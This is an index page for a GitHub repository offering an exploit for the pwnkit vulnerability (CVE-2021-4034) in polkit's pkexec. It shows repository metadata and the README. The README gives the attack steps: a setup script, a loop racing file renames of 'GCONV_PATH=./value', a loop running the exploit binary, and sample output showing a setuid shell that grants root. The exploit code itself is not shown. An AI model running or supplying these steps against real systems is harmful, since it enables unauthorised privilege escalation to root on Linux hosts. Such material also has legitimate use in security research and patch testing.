Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Ayrx/CVE-2021-4034
Exploit for CVE-2021-4034
https://github.com/Ayrx/CVE-2021-4034
Last synced: 3 months ago
JSON representation
Exploit for CVE-2021-4034
- Host: GitHub
- URL: https://github.com/Ayrx/CVE-2021-4034
- Owner: Ayrx
- Created: 2022-01-26T03:33:47.000Z (almost 3 years ago)
- Default Branch: master
- Last Pushed: 2022-01-27T11:57:05.000Z (almost 3 years ago)
- Last Synced: 2024-05-02T17:53:07.613Z (6 months ago)
- Language: C
- Homepage:
- Size: 3.91 KB
- Stars: 96
- Watchers: 6
- Forks: 14
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - Ayrx/CVE-2021-4034 - Exploit for CVE-2021-4034 (C)
README
# CVE-2021-4034
Exploit for the [pwnkit vulnerability](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
from the Qualys team.
This exploit assumes that `gcc` is present on the target machine.
```
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
```
Run the following command in one bash session:
```
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
```
Run the following command in another bash session:
```
while :; do ./exploit; done
```
You will eventually win the race and obtain a `shell` binary that gives you
root access:
```
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
```
A short write up on the technique can be found on my [blog](https://www.ayrx.me/pwnkit-no-logs/).